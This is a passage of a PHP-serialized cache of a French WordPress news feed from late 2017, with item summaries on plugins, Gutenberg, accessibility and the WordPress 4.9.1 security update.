href=\"https://wpformation.com/formation-wordpress/\">Formation WordPress</a>, <a href=\"https://wpformation.com/formation-wordpress-pro/\">SEO</a> &amp; <a href=\"https://wpformation.com/formation-woocommerce-e-commerce/\">WooCommerce</a> - Pour ne rien manquer : <a href=\"https://wpformation.com/abonnement-newsletter-wpf/\">Abonnez-vous à la newsletter</a> !</p>\n<hr><img src=\"http://feeds.feedburner.com/~r/wpfr/~4/eTpoqvkpD9o\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"https://wpformation.com/espace-membres-wordpress/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:84:\"\n		        \n		        \n		        \n		        \n		        \n		        \n		        \n		    \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:45:\"L’extension « Press This » de WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"http://feedproxy.google.com/~r/wpfr/~3/f6qqh4RrMWY/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:42:\"https://dfarnier.fr/lextension-press-this/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 06 Dec 2017 11:56:33 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:613:\"\n		        Vous consultez un site internet, et vous aimeriez pouvoir facilement recopier tout ou partie de son contenu dans un nouvel article publié sur votre site WordPress. C&#8217;est exactement ce que permet l&#8217;extension « Press This ». Jusqu&#8217;à la version 4.8, l&#8217;outil était intégré au noyau de WordPress. Depuis la version 4.9, il faut installer l&#8217;extension « Press This ». &#8230; Suite de l\'article L&#8217;extension « Press This » de WordPress ...\nCet article L&rsquo;extension « Press This » de WordPress est apparu en premier sur Débuter WordPress.		        \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Daniel Farnier\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:933:\"<p>Vous consultez un site internet, et vous aimeriez pouvoir facilement recopier tout ou partie de son contenu dans un nouvel article publié sur votre site WordPress. C&#8217;est exactement ce que permet l&#8217;extension « Press This ». Jusqu&#8217;à la version 4.8, l&#8217;outil était intégré au noyau de WordPress. Depuis la version 4.9, il faut installer l&#8217;extension « Press This ». &#8230; <a href=\"https://dfarnier.fr/lextension-press-this/\" class=\"more-link\">Suite de l\'article <span class=\"screen-reader-text\">L&#8217;extension « Press This » de WordPress</span> ...</a></p>\n<p>Cet article <a rel=\"nofollow\" href=\"https://dfarnier.fr/lextension-press-this/\">L&rsquo;extension « Press This » de WordPress</a> est apparu en premier sur <a rel=\"nofollow\" href=\"https://dfarnier.fr\">Débuter WordPress</a>.</p><img src=\"http://feeds.feedburner.com/~r/wpfr/~4/f6qqh4RrMWY\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:42:\"https://dfarnier.fr/lextension-press-this/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:84:\"\n		        \n		        \n		        \n		        \n		        \n		        \n		        \n		    \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:45:\"WordPress en 2018 et la révolution Gutenberg\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"http://feedproxy.google.com/~r/wpfr/~3/O1Lt2NL6wRs/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:69:\"http://www.geekpress.fr/wordpress-en-2018-et-la-revolution-gutenberg/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 05 Dec 2017 19:12:03 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:501:\"\n		        Chaque année en décembre se déroule le WordCamp US (voir notre article sur l’édition 2016), l’évènement le plus attendu avec le WordCamp Europe. En plus des conférences et du contributeur day, c’est aussi l’occasion d’assister au State of the Word (#SOTW) présenté par Matt Mullenweg qui annonce les changements majeurs sur WordPress. Les 2000 participants [&#8230;]\nCet article WordPress en 2018 et la révolution Gutenberg est apparu en premier sur GeekPress.		        \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"Geekpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:737:\"<p>Chaque année en décembre se déroule le WordCamp US (voir notre article sur l’édition 2016), l’évènement le plus attendu avec le WordCamp Europe. En plus des conférences et du contributeur day, c’est aussi l’occasion d’assister au State of the Word (#SOTW) présenté par Matt Mullenweg qui annonce les changements majeurs sur WordPress. Les 2000 participants [&#8230;]</p>\n<p>Cet article <a rel=\"nofollow\" href=\"http://www.geekpress.fr/wordpress-en-2018-et-la-revolution-gutenberg/\">WordPress en 2018 et la révolution Gutenberg</a> est apparu en premier sur <a rel=\"nofollow\" href=\"http://www.geekpress.fr\">GeekPress</a>.</p><img src=\"http://feeds.feedburner.com/~r/wpfr/~4/O1Lt2NL6wRs\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:69:\"http://www.geekpress.fr/wordpress-en-2018-et-la-revolution-gutenberg/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:84:\"\n		        \n		        \n		        \n		        \n		        \n		        \n		        \n		    \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:93:\"L’accessibilité numérique : une composante essentielle pour un site WordPress de qualité\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"http://feedproxy.google.com/~r/wpfr/~3/kgxuTHe-SvE/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:113:\"https://www.wpnormandie.fr/laccessibilite-numerique-une-composante-essentielle-pour-un-site-wordpress-de-qualite/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 05 Dec 2017 14:24:32 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:408:\"\n		        L’accessibilité numérique permet aux personnes en situation de handicap d’utiliser votre site WordPress comme tout le monde, sans blocage, sans perte d’information et en utilisant tous les services que vous mettez à la disposition des internautes. D’après l’organisme commun des institutions de rente et de prévoyance (ocirp), 20 % de la population en France est [&#8230;]		        \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:478:\"L’accessibilité numérique permet aux personnes en situation de handicap d’utiliser votre site WordPress comme tout le monde, sans blocage, sans perte d’information et en utilisant tous les services que vous mettez à la disposition des internautes. D’après l’organisme commun des institutions de rente et de prévoyance (ocirp), 20 % de la population en France est [&#8230;]<img src=\"http://feeds.feedburner.com/~r/wpfr/~4/kgxuTHe-SvE\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:113:\"https://www.wpnormandie.fr/laccessibilite-numerique-une-composante-essentielle-pour-un-site-wordpress-de-qualite/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:84:\"\n		        \n		        \n		        \n		        \n		        \n		        \n		        \n		    \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:75:\"FacetWP vs Search &amp; Filter : quel est le meilleur plugin de filtres ?\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"http://feedproxy.google.com/~r/wpfr/~3/17oNxqPzpW4/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"https://wpformation.com/facetwp-vs-search-filter/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 04 Dec 2017 07:45:10 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:593:\"\n		        Lorsque l\'on crée des sites WordPress avancés, il arrive que l\'ont ait besoin d\'un plugin qui permette à l\'internaute de filtrer les contenus disponibles sur le site afin qu\'il puisse trouver plus rapidement les informations qu\'il recherche. On retrouve les filtres le plus fréquemment sur les sites e-commerce mais ils peuvent servir pour tout type [&#8230;]\n\n\nFacetWP vs Search &amp; Filter : quel est le meilleur plugin de filtres ? est un article de WP FormationFormation WordPress, SEO &amp; WooCommerce - Pour ne rien manquer : Abonnez-vous à la newsletter !\n		        \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"WP Formation\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:1445:\"<p><img width=\"1118\" height=\"381\" src=\"https://cdn.wpformation.com/wp-content/uploads/2017/10/facetwp-vs-search-and-filter-pro.jpg\" class=\"attachment-Large size-Large wp-post-image\" alt=\"facetwp vs search &amp; filter pro\" style=\"margin-left: 0px;margin-right: auto;margin-top:10px;margin-bottom:10px;max-width: 640px;max-height: 400px\" />Lorsque l\'on crée des sites WordPress avancés, il arrive que l\'ont ait besoin d\'un plugin qui permette à l\'internaute de filtrer les contenus disponibles sur le site afin qu\'il puisse trouver plus rapidement les informations qu\'il recherche. On retrouve les filtres le plus fréquemment sur les sites e-commerce mais ils peuvent servir pour tout type [&#8230;]</p>\n<p></p>\n<hr>\n<a rel=\"nofollow\" href=\"https://wpformation.com/facetwp-vs-search-filter/\">FacetWP vs Search &amp; Filter : quel est le meilleur plugin de filtres ?</a> est un article de <a title=\"Formation WordPress Ecommerce\" href=\"https://wpformation.com\">WP Formation</a><br /><a href=\"https://wpformation.com/formation-wordpress/\">Formation WordPress</a>, <a href=\"https://wpformation.com/formation-wordpress-pro/\">SEO</a> &amp; <a href=\"https://wpformation.com/formation-woocommerce-e-commerce/\">WooCommerce</a> - Pour ne rien manquer : <a href=\"https://wpformation.com/abonnement-newsletter-wpf/\">Abonnez-vous à la newsletter</a> !</p>\n<hr><img src=\"http://feeds.feedburner.com/~r/wpfr/~4/17oNxqPzpW4\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"https://wpformation.com/facetwp-vs-search-filter/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:84:\"\n		        \n		        \n		        \n		        \n		        \n		        \n		        \n		    \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:52:\"Supporter les galeries d’images WordPress en HTML5\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"http://feedproxy.google.com/~r/wpfr/~3/rmn4bLD4LY0/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:55:\"https://wpchannel.com/support-galeries-wordpress-html5/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 03 Dec 2017 15:34:50 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:386:\"\n		        WordPress ajoute des styles par défaut sur les galeries d&#8217;images de vos articles pour les thèmes qui ne gèrent pas le support en HTML5 de ce type d&#8217;élément. À l&#8217;aide d&#8217;un bout de code, vous pourrez désactiver ces styles et ainsi avoir à nouveau la possibilité d&#8217;appliquer vos propres styles CSS. Un thème bien codé [&#8230;]		        \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"WP Channel\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:666:\"<img width=\"448\" height=\"300\" src=\"https://wpchannel.com/images/2017/04/museum-gallery-448x300.jpg\" class=\"webfeedsFeaturedVisual wp-post-image\" alt=\"\" style=\"margin: auto;margin-bottom: 5px;max-width: 100%\" />WordPress ajoute des styles par défaut sur les galeries d&#8217;images de vos articles pour les thèmes qui ne gèrent pas le support en HTML5 de ce type d&#8217;élément. À l&#8217;aide d&#8217;un bout de code, vous pourrez désactiver ces styles et ainsi avoir à nouveau la possibilité d&#8217;appliquer vos propres styles CSS. Un thème bien codé [&#8230;]<img src=\"http://feeds.feedburner.com/~r/wpfr/~4/rmn4bLD4LY0\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:55:\"https://wpchannel.com/support-galeries-wordpress-html5/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:84:\"\n		        \n		        \n		        \n		        \n		        \n		        \n		        \n		    \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"Version 4.9.1 : WordPress corrige sécurité et bug\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"http://feedproxy.google.com/~r/wpfr/~3/RSXCI6g3B2Q/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:75:\"https://www.wpnormandie.fr/version-4-9-1-wordpress-corrige-securite-et-bug/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 30 Nov 2017 07:13:50 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:369:\"\n		        Ce n&#8217;est pas moins de 11 bugs et des problèmes de sécurité qui sont corrigés dans la version « WordPress 4.9.1 » qui vient de sortir. Si votre installation ne met pas à jour automatiquement votre site nous vous conseillons vivement de faire cette mise à jour d’urgence. Consulter cet article que nous avions fait sur les [&#8230;]		        \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:439:\"Ce n&#8217;est pas moins de 11 bugs et des problèmes de sécurité qui sont corrigés dans la version « WordPress 4.9.1 » qui vient de sortir. Si votre installation ne met pas à jour automatiquement votre site nous vous conseillons vivement de faire cette mise à jour d’urgence. Consulter cet article que nous avions fait sur les [&#8230;]<img src=\"http://feeds.feedburner.com/~r/wpfr/~4/RSXCI6g3B2Q\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:75:\"https://www.wpnormandie.fr/version-4-9-1-wordpress-corrige-securite-et-bug/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:84:\"\n		        \n		        \n		        \n		        \n		        \n		        \n		        \n		    \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:89:\"Comment partager vos brouillons d’articles WordPress à l’aide de liens temporaires ?\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"http://feedproxy.google.com/~r/wpfr/~3/jBmYWTg8aq0/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:63:\"https://wpformation.com/partager-brouillons-articles-wordpress/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 28 Nov 2017 07:35:43 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:618:\"\n		        La plupart du temps, donner à vos collaborateurs un accès sans restrictions à votre tableau de bord n’est pas une bonne idée. Après tout, plus le nombre de personnes disposant des privilèges administrateurs est élevé, plus la chance est grande qu’un problème entraînant de lourdes conséquences survienne sur votre site. Un excellent moyen de limiter [&#8230;]\n\n\nComment partager vos brouillons d’articles WordPress à l’aide de liens temporaires ? est un article de WP FormationFormation WordPress, SEO &amp; WooCommerce - Pour ne rien manquer : Abonnez-vous à la newsletter !\n		        \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"WP Formation\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:1474:\"<p><img width=\"931\" height=\"516\" src=\"https://cdn.wpformation.com/wp-content/uploads/2017/11/Fotolia_166136979_S.jpg\" class=\"attachment-Large size-Large wp-post-image\" alt=\"Partager brouillons articles WordPress\" style=\"margin-left: 0px;margin-right: auto;margin-top:10px;margin-bottom:10px;max-width: 640px;max-height: 400px\" />La plupart du temps, donner à vos collaborateurs un accès sans restrictions à votre tableau de bord n’est pas une bonne idée. Après tout, plus le nombre de personnes disposant des privilèges administrateurs est élevé, plus la chance est grande qu’un problème entraînant de lourdes conséquences survienne sur votre site. Un excellent moyen de limiter [&#8230;]</p>\n<p></p>\n<hr>\n<a rel=\"nofollow\" href=\"https://wpformation.com/partager-brouillons-articles-wordpress/\">Comment partager vos brouillons d’articles WordPress à l’aide de liens temporaires ?</a> est un article de <a title=\"Formation WordPress Ecommerce\" href=\"https://wpformation.com\">WP Formation</a><br /><a href=\"https://wpformation.com/formation-wordpress/\">Formation WordPress</a>, <a href=\"https://wpformation.com/formation-wordpress-pro/\">SEO</a> &amp; <a href=\"https://wpformation.com/formation-woocommerce-e-commerce/\">WooCommerce</a> - Pour ne rien manquer : <a href=\"https://wpformation.com/abonnement-newsletter-wpf/\">Abonnez-vous à la newsletter</a> !</p>\n<hr><img src=\"http://feeds.feedburner.com/~r/wpfr/~4/jBmYWTg8aq0\" height=\"1\" width=\"1\" 